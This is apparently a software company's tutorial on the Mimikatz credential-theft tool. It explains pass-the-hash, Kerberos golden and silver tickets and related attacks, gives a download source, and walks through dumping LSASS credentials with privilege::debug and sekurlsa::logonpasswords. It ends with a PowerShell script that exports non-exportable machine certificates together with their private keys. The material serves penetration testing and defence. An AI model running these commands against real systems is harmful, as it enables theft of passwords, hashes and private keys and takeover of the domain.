What is Mimikatz?

Mimikatz was originally developed by Benjamin Delpy to demonstrate to Microsoft that its authentication protocols were vulnerable, and in particular that plaintext passwords could be recovered from the memory of the LSASS process. In doing so, he inadvertently created one of the most used and downloaded hacking tools of the last 20 years.

Experts believe that Mimikatz has done more to improve security than any other known tool. Hackers can infiltrate your networks - stay one step ahead of them.

Mimikatz overview

Mimikatz is an open source program that lets its user view and save authentication material such as plaintext passwords, NT hashes and Kerberos tickets. Development is still led by Benjamin Delpy, which is why the toolkit keeps pace with current editions of Windows and implements the latest attacks.

Attackers typically use Mimikatz to steal credentials and gain elevated privileges; in most cases the stock binary is detected and quarantined by endpoint protection and antivirus products. Penetration testers, on the other hand, use Mimikatz to find and exploit credential-handling weaknesses in their own networks so that they can be closed.

What can Mimikatz do?

Mimikatz initially demonstrated how the way Windows keeps credentials in memory could be abused. Today it implements a range of credential-theft and credential-reuse techniques, including:

Pass-the-Hash. Windows stores passwords as NT hashes (commonly called NTLM hashes), and NTLM authentication proves possession of the hash, not of the password. With Mimikatz, an attacker who has dumped a user's NT hash can start a process that authenticates to remote computers with that hash directly; cracking the password is unnecessary. It's like finding the master key to a building on the ground: one key opens every door.

Pass-the-Ticket. In an Active Directory domain, authentication normally uses Kerberos: the domain controller issues the user a ticket-granting ticket (TGT) and service tickets, which Windows caches in LSASS. Mimikatz can export these tickets and inject them into a session on another computer, so the attacker acts as that user without knowing the password or the hash. Conceptually this is the same as pass-the-hash; the practical difference is that tickets expire (a TGT is valid for 10 hours by default) and are only useful until their renewal lifetime runs out.

Over-Pass-the-Hash (Pass-the-Key). Another variant of pass-the-hash. Instead of using the user's NT hash for NTLM authentication, Mimikatz uses it, or the user's AES Kerberos key, to request a TGT from the domain controller, so the attacker ends up with legitimate Kerberos tickets and never sends NTLM over the network. The key can be taken from LSASS memory or, with sufficient rights, from the domain controller's account database.

Kerberos Golden Ticket. A pass-the-ticket attack with a forged ticket. Every TGT is encrypted and signed with the key of the krbtgt account, a built-in account that exists in every domain. An attacker who obtains the krbtgt NT hash or AES key (for example from a domain controller) can forge a TGT for any user with any group membership, including Domain Admins, and it is accepted by every computer in the domain. The forged ticket keeps working until the krbtgt password has been changed twice, so in practice the access is permanent unless defenders deliberately rotate that key.

Kerberos Silver Ticket. Another forged ticket, this time a service ticket (TGS) rather than a TGT. A service ticket is encrypted with the key of the account the service runs as, which for services such as CIFS or HTTP on a host is usually that computer's account. Anyone holding that account's NT hash can forge a ticket for that one service, and because most services never ask the domain controller to validate the ticket after it is presented, the forged ticket is accepted without the domain controller logging anything. The scope is narrower than a golden ticket (one service on one host), but the attack is much quieter.

Pass-the-Cache. Finally, an attack that doesn't start on Windows. Kerberos clients on Linux, macOS and other UNIX systems keep their tickets in a credential cache (ccache) file. Mimikatz can load such a file and inject the tickets it contains into a Windows session, after which the attack proceeds exactly like pass-the-ticket.

Sources for downloading Mimikatz

You can download Mimikatz from Benjamin Delpy's GitHub repository (https://github.com/gentilkiwi/mimikatz), which offers both release binaries and the source code. The source builds with Visual Studio 2010 or later. Expect the download to be flagged by antivirus software, so work on a lab machine or in an excluded test directory.

How to use Mimikatz?

When you start the executable, you are presented with an interactive Mimikatz console from which you can run commands in real time. Commands can also be passed as command-line arguments, which is convenient for scripting.

Running Mimikatz as administrator

To get the full functionality of Mimikatz, launch it with "Run as administrator" even when you are logged in as an administrator: under UAC a normal administrator shell runs without the elevated token, and the credential-dumping commands need privileges that only an elevated process can enable.

Checking the Mimikatz version

There are two builds of Mimikatz, 32-bit (Win32) and 64-bit (x64). Use the one that matches your Windows installation: a 32-bit Mimikatz cannot read the memory of a 64-bit LSASS. The version command prints the Mimikatz build, the Windows version and architecture, and whether Windows settings are preventing Mimikatz from running correctly.

Retrieving plaintext passwords from memory

The sekurlsa module dumps credentials from LSASS memory. Its commands require administrator rights with the debug privilege enabled, or SYSTEM.

First run this command:

mimikatz # privilege::debug

The output should read Privilege '20' OK. An error here means you are not running elevated, and the following commands will fail.

Then turn on logging so that you can review the output later; everything printed to the console is also appended to the file:

mimikatz # log nameoflog.log

Finally, dump the credentials of every logon session on this computer. Whether plaintext passwords appear depends on the host: on Windows 8.1 / Server 2012 R2 and later, WDigest no longer caches plaintext by default, so you will usually see NT hashes and Kerberos keys rather than passwords, and with LSA Protection or Credential Guard enabled the command returns little or nothing.

mimikatz # sekurlsa::logonpasswords

Using other Mimikatz modules

The crypto module accesses the Windows Crypto API (CryptoAPI and CNG), which lets you list and export certificates together with their private keys, even if the keys are marked as non-exportable, after patching the export checks in the current process and in the key isolation service.

The kerberos module accesses the Kerberos API, so you can list, export, purge and inject tickets in the current session; it is also the module that forges the golden and silver tickets described above.

The service module allows you to start, stop, suspend, resume and remove Windows services.
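An example of the crypto module in use: export the machine's certificates with their private keys and then confirm that the resulting PFX files really carry a key. This is an added example and not code from the original article or from the Mimikatz project; it assumes an elevated prompt with mimikatz.exe in the current directory, and relies on Mimikatz protecting exported PFX files with the password "mimikatz".

```powershell
# Added example (not from the original article): export "non-exportable" machine
# certificates with the crypto module and verify the private key came with them.
# Assumes an elevated prompt with mimikatz.exe in the current directory.
$start = Get-Date

# crypto::capi patches CryptoAPI in the mimikatz process, crypto::cng patches the key isolation
# service (needs privilege::debug); without them only the public part can be exported.
& .\mimikatz.exe "privilege::debug" "crypto::capi" "crypto::cng" `
    "crypto::certificates /systemstore:local_machine /store:My /export" "exit" | Out-Null

# Mimikatz writes one .der (public part) per certificate and a .pfx when the key export worked.
function Test-ExportedPfx([string]$Path, [string]$Password = 'mimikatz') {
    $flags = [System.Security.Cryptography.X509Certificates.X509KeyStorageFlags]::Exportable
    $cert  = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($Path, $Password, $flags)
    [pscustomobject]@{
        File          = Split-Path $Path -Leaf
        Subject       = $cert.Subject
        HasPrivateKey = $cert.HasPrivateKey   # $false means the patch did not take for this key
        NotAfter      = $cert.NotAfter
    }
}

Get-ChildItem -Filter '*.pfx' | Where-Object { $_.LastWriteTime -ge $start } |
    ForEach-Object { Test-ExportedPfx $_.FullName }
```

A certificate that shows up only as a .der file, with no matching .pfx, is one whose key is held somewhere the patch does not reach, such as a hardware security module or a TPM-backed key.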

Mainton Company - custom software development and testing, DevOps and SRE, SEO and online advertising since 2004.
